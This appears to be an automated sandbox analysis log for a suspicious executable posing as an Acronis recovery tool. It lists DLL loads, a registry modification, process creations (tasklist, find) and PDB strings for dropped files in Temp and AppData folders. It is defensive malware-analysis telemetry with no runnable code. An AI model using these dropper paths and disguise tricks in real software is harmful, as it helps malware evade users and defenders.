                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.fileexplorer.common.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: shdocvw.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: msimg32.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: msncore.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: msacm32.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: msidcrl40.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: contactsux.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: cryptnet.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: sensapi.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: oleacc.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: winmmbase.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: winmmbase.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: dbghelp.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: shdocvw.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: wtsapi32.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: winsta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: textinputframework.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: coreuicomponents.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: coremessaging.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: shfolder.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: rstrtmgr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: slc.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: wtsapi32.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: winsta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: textinputframework.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: coreuicomponents.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: coremessaging.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: shfolder.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: rstrtmgr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: textshaping.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: dwmapi.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: sfc.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: sfc_os.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: explorerframe.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpSection loaded: apphelp.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: wtsapi32.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: winsta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: textinputframework.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: coreuicomponents.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: coremessaging.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: shfolder.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: rstrtmgr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpSection loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpWindow found: window name: TMainForm
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: acronis recovery expert deluxe 1.0.0.132.rarl.exeStatic file information: File size 829879991 > 1048576
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msvcr80.dll
                Source: acronis recovery expert deluxe 1.0.0.132.rarl.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: D:\Jenkins\workspace\AC_KillProcess\x64\Release\KillProcess.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008E15000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\agent\_work\4\s\binaries\amd64ret\bin\amd64\\vcruntime140_1d.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGAManufacturerLib\x64\Release\VGAManufacturerLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ML\Code\ACUT\Server\ACUT V2.2.12.0\ACUninstallTool\x64\Release\ServiceUninstall.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGATypeLib\x64\Release\VGATypeLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\openssl-1.1.1j\libcrypto-1_1-x64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000903C000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\CPUManufacturerCmdLib\x64\Release\CPUManufacturerCmdLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VideoMemoryLib\x64\Release\VideoMemoryLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGAManufacturerLib\x64\Release\VGAManufacturerLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msidcrl40.pdb source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp
                Source: Binary string: msidcrl40.pdbL source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp
                Source: Binary string: wntdll.pdb source: msn.exe, 00000027.00000002.2177671711.0000000009D57000.00000004.00000020.00020000.00000000.sdmp, msn.exe, 00000027.00000002.2183545080.000000000A0B0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtscript\lib\Qt5ScriptTools.pdbmm source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
